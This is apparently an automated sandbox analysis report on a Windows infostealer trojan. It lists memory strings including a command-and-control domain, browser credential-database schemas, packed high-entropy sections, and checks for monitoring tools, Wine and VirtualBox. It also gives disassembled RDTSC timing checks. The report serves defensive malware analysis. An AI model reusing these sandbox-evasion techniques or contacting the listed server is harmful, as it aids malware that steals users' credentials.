Source: file.exe, 00000002.00000003.1490451305.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.micy1D
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000002.00000003.1478339631.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1450031646.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1490554719.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532395344.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449635687.0000000000802000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/
Source: file.exe, 00000002.00000003.1421786251.000000000546F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422914925.0000000005473000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1421973811.0000000005473000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/;
Source: file.exe, 00000002.00000002.1635250870.000000000547A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/D(
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/api
Source: file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/api=
Source: file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/apiC
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/apiecked
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/apiq
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/apix
Source: file.exe, 00000002.00000003.1484843360.0000000005461000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/on
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cook-rain.sbs/v1=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49832 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973893873762376
Source: file.exe	Static PE information: Section: cizbpulm ZLIB complexity 0.994610956970405

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/3

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OLUMS4HX.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000002.00000003.1407994974.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1383510400.0000000005496000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.0000000005478000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: file.exe

Static file information: File size 1814016 > 1048576

Source: file.exe

Static PE information: Raw size of cizbpulm is bigger than: 0x100000 < 0x191400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 2.2.file.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cizbpulm:EW;joqsldst:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cizbpulm:EW;joqsldst:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c9902 should be: 0x1be757

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: cizbpulm
Source: file.exe	Static PE information: section name: joqsldst
Source: file.exe	Static PE information: section name: .taggant

Source: file.exe	Static PE information: section name: entropy: 7.972498189955862
Source: file.exe	Static PE information: section name: cizbpulm entropy: 7.953165385789899

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACB9C2 second address: ACB9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3755E second address: C3756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F626941E956h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3756C second address: C37570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E395 second address: C2E3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F626941E956h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E3A8 second address: C2E3D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6268DAF3D3h 0x00000008 jmp 00007F6268DAF3D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E3D7 second address: C2E3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F626941E964h 0x0000000d jo 00007F626941E95Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C387D6 second address: C387DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38854 second address: C3885A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3885A second address: C38910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, dword ptr [ebp+122D2812h] 0x00000010 push 00000000h 0x00000012 jmp 00007F6268DAF3D2h 0x00000017 push 7C40A682h 0x0000001c jmp 00007F6268DAF3D0h 0x00000021 xor dword ptr [esp], 7C40A602h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F6268DAF3C8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add dh, 00000032h 0x00000045 push 00000003h 0x00000047 mov di, 6FFCh 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007F6268DAF3C8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 sbb di, D48Ah 0x0000006c mov cx, 585Bh 0x00000070 push 00000003h 0x00000072 add esi, dword ptr [ebp+122D28A2h] 0x00000078 push AED281C4h 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38910 second address: C3891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626941E956h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A8D second address: C38A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A93 second address: C38A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A9C second address: C38AE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jnp 00007F6268DAF3C6h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F6268DAF3D2h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F6268DAF3D0h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jns 00007F6268DAF3C6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38AE3 second address: C38B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 xor si, 6B62h 0x0000000d push 00000003h 0x0000000f and edx, 1DFE1271h 0x00000015 push 00000000h 0x00000017 call 00007F626941E95Ah 0x0000001c mov edx, eax 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 mov si, ax 0x00000024 call 00007F626941E959h 0x00000029 push edx 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d jmp 00007F626941E95Eh 0x00000032 popad 0x00000033 pop edx 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F626941E969h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38B45 second address: C38C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6268DAF3D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F6268DAF3D8h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F6268DAF3D9h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jnp 00007F6268DAF3CAh 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F6268DAF3C8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 add edi, dword ptr [ebp+122D2852h] 0x00000048 lea ebx, dword ptr [ebp+12440734h] 0x0000004e mov edx, dword ptr [ebp+122D2926h] 0x00000054 xchg eax, ebx 0x00000055 jmp 00007F6268DAF3D9h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F6268DAF3D5h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38C0D second address: C38C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38C71 second address: C38C95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6268DAF3D2h 0x00000017 rdtsc
